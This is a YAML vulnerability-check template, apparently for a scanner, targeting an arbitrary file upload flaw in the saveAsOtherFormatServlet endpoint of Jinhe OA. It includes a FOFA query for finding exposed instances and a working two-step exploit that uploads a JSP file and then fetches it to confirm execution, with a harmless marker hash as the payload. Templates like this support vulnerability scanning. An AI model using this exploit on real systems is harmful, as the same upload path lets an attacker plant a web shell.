product: 金和OA
vName: 金和OA saveAsOtherFormatServlet任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 金和OA协同办公管理系统在saveAsOtherFormatServlet接口存在任意文件上传漏洞，攻击者可以上传jsp文件，也可以上传木马，容易造成严重的影响。
version: ''
note: ''
search:
  FOFA: app="金和网络-金和OA"
protocol: http
link: https://blog.csdn.net/qq_56698744/article/details/134830686
fix:
  - 请联系厂家 http://www.jinher.com/升级
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /jc6/servlet/saveAsOtherFormatServlet?fileName=52e039302a62d077.jsp
      file:
        FileBlod:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - image/png
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - OK
            logic: and
  - exp:
      method: get
      follow: false
      path: /jc6/upload/gwzw/52e039302a62d077.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and